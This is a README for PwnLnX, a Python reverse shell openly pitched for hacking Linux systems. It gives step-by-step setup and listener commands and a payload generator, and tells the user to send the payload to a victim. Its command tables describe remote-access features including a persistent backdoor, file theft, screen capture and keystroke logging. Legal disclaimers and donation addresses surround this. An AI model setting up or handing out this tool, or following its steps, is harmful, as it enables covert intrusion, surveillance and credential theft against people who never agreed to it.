An advanced multi-threaded, multi-client python reverse shell for hacking linux systems. There's still more work to do so feel free to help out with the development. Disclaimer: This reverse shell should only be used in the lawful, remote administration of authorized systems. Accessing a computer network without authorization or permission is illegal.
An advanced multi-threaded, multi-client python reverse shell for hacking linux systems. There’s still more work to do so feel free to help out with the development.
Disclaimer: This reverse shell should only be used in the lawful, remote administration of authorized systems. Accessing a computer network without authorization or permission is illegal.
📫 Reach me out!
Please follow these instructions to get a copy of PwnLnX running on your local machine without any problems.
# Download source code
git clone https://github.com/OxTRAW/PwnLnX.git
cd PwnLnX
# download and install the dipendences
chmod +x setup.sh
./setup.sh
python3 PwnLnX.py --help
python3 PwnLnX.py --lhost [your localhost ip address] --lport [free port for listening incoming connections]
chmod +x PwnGen.sh
./PwnGen.sh
then follow the procedure to successifully create your payload, the payload is saved in PwnLnx directory. Send the created payload to victim
Command | Usage |
---|---|
help | show help |
exit | close all the sessions and quit the progaram. |
show sessions | show all available sessions from connected. |
session [ID] | interact with a specified session ID. |
kill [all/ID] | kill a specified session or all to kill all sessions. |
banner | have funny by changing the program banner |
Command | Usage |
---|---|
help | show help. |
quit | close the current session. |
background | background the current session. |
sysinfo | get minimum target system information. |
create_persist | create a persistant backdoor. |
upload | upload the specified filename to the target system. |
download | download the specified filename from the target system. |
screenshot | take a desktop screenshot of the target system. |
start_screenshare | start desktop screensharing. |
stop_screenshare | stop desktop screensharing. |
start_keycap | start capturing victim’s pressed keystrokes. |
dump_keycap | dump/get the captured keystrokes. |
stop_keycap | stop the capturing keystrokes. |
NB. you can also execute linux system commands besides those listed above.
I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.
Bitcoin Address
bc1q33ncrxzpuc5n02dc05kl44vpmaw53wf3ztq78q
Etherium Address
0x1c9155bc825CBa45B64741f2E33069d6808AdD92
Litecoin Address
LRvPjCq3ZNunLz3bnSc4wz4FDJF8AZUJLK